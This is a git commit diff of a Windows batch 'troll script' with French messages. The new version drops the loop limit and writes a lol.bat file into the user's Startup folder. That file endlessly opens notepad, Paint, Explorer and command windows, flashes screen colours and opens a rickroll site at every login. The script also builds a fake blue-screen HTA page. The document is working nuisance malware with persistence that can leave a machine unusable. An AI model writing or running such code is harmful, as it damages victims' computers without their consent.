updated YOLO troll script to v2

Cette révision appartient à :
Albirew 2024-09-28 02:07:32 +02:00
Parent 911e4fe26b
révision 630f54d061
Signé par: Albirew
ID de la clé GPG: 9D72DAEB1BB933C9

Voir le fichier

@ -1,27 +1,29 @@
@echo off
:: YOLO v1 - debut des hostilites
setlocal ENABLEDELAYEDEXPANSION
:: YOLO v2 - tu peux pas test
msg * salut a toi
msg * ceci sera ta seule chance avant de te faire pwner
set reponse=
:q
echo veux-tu te faire pwner? (oui/non)
set /p reponse=
if /i %reponse%==oui (echo C'est parti, mon kiki!) else (echo Allez, quoi... fait pas ta precieuse! & goto q)
set lol=0
:pwn
set /a lol=%lol%+1
set /a variable=%lol% %%2
if !variable! EQU 0 (color 0f) else (color f0)
start http://rickrolled.fr
start notepad.exe
msg * NORAJ!
start mspaint.exe
start explorer.exe
start cmd.exe
if %lol%==100 goto fin
GOTO pwn
cd "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
echo @echo off > lol.bat
echo setlocal ENABLEDELAYEDEXPANSION >> lol.bat
echo set lol=0 >> lol.bat
echo :pwn >> lol.bat
echo set /a lol=%%lol%%+1 >> lol.bat
echo set /a variable=%%lol%% %%%%2 >> lol.bat
echo if !variable! EQU 0 (color 0f) else (color f0) >> lol.bat
echo start http://rickrolled.fr >> lol.bat
echo start notepad.exe >> lol.bat
echo msg * NORAJ! >> lol.bat
echo start mspaint.exe >> lol.bat
echo start explorer.exe >> lol.bat
echo start cmd.exe >> lol.bat
echo GOTO pwn >> lol.bat
:fin
cd %tmp%
echo ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.hta
echo. >> bsod.hta
@ -59,5 +61,4 @@ echo ^<p^>Contact your system administrator or technical support group for furth
echo. >> bsod.hta
echo. >> bsod.hta
echo ^</font^> >> bsod.hta
echo ^</body^>^</html^> >> bsod.hta
start "" "bsod.hta"
echo ^</body^>^</html^> >> bsod.hta